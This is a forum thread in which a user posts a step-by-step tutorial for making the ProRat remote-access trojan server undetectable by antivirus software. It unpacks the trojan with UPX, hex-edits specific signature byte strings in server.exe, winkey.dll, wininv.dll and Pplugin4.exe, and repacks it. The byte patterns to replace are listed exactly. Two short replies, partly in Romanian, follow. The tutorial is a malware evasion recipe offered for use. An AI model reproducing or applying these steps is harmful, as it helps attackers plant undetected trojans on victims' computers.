RedJoker Posted September 15, 2006 Report Share Posted September 15, 2006 The required programs to complete this task. 1) ProRat Server. Found at: http://www.prorat.net. 2) UPX Packer/Unpacker. Found at: http://upx.sf.net 3) Hex Editor. (Hex Workshop recommended). 4) Fearless BFE So lets start. 1) First simply create your Server via ProRat client with the settings which you choose. 2) Unpack the server. Go to Command Prompt and run upx.exe from there. After thats accomplished, unpack the server.exe by writing in "upx -d server.exe". To repack it later on at the end, simply write "upx -9 "server.exe". 3) AV's Have a selected piece of code within the server which tells whether it is a dangerous object or not. This part is the most important. a) First lets stop it from being reconized. Prorat 1.9 un most reconized piece of code is C4C0535657 To help you find it more easily, search up this longer piece of code. 8D09005F5E5B8BE55DC39090558BEC83C4C0535657 Now our code is 8D09005F5E5B8BE55DC39090558BEC83C4C0535657 we will change this too 8D09005F5E5B8BE55DC39090558BEC83C4C0535647 (this will be detected by now but just an example). To make our server completely undetected, we will need to edit winkey.dll and wininv.dll. How we can do this? Prorat is found in 3 different pieces. winkey.dll, wininv.dll and Pplugin4.exe. To extract these files you will need Fearless BFE. For stopping the AV's from reconizing this part of code we must do the same thing. our code is winkey.ddl: 0321450C837D0C007411A14C30001085C07408575653FFD0 we will change this too 0321450C837D0C007411A14C30001085C07408575653FF47 c) For stopping this part of the code being detected we must change the code once more. our code is wininv.ddl: 837D0C007411A15C31001085C07408575653FF we will change this too 837D0C007411A15C31001085C0740857565347 d) One last time. our code is Pplugin4.exe: 6472712E696E6900637279707465642D70617373776F726400 0000000000 we will change it too 6472712E696E6900637279707465642D70617373776F726400 0000000047 Now we are undetected. Repack the file and enjoy! Quote Link to comment Share on other sites More sharing options...
eddie47 Posted September 15, 2006 Report Share Posted September 15, 2006 RedJoker;20600 wrote: Rapidshare Toolz Collection http://rapidshare.de/files/16388304/new.rar.htmlIncearca sa uploadezi tot ce ai postat in legatura cu leechingul si cu tools-urile de RS pe rapidshare.ro te rog ^: )^ Quote Link to comment Share on other sites More sharing options...
B_Real Posted September 17, 2006 Report Share Posted September 17, 2006 asta ii mai mult un totorial ,o sa incerc cand am timp sa vad ce reusesc Quote Link to comment Share on other sites More sharing options...
